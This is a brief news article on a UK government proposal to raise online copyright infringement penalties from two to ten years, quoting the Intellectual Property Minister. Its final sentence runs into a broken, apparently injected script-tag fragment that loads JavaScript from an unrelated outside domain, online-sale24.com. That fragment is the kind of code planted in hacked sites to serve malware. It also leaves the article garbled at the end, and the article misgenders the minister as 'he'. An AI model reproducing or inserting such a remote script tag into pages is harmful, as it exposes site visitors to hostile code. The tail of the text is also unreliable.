UK government calls for 10-year imprisonment for copyright infringers

The UK ministers proposed to increase the two-year online copyright infringement penalty to 10 years. They said that two years in prison is not enough to prevent online piracy.

The said consultation targets the distributors of pirated copyrighted content specifically the ones who create and upload the copies of movies before and after release.

According to Intellectual Property Minister Baroness Neville-Rolfe, by increasing the sentence term of penalty for online copyright infringement, there will be a greater protection for businesses and criminals can understand their message more clearly.

“Our creative industries are worth more than £7 billion to the UK economy and it’s important to protect them from online criminal enterprises,” he said.

Copyright holders who have petitioned for this for quite a long time now welcome the proposal. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
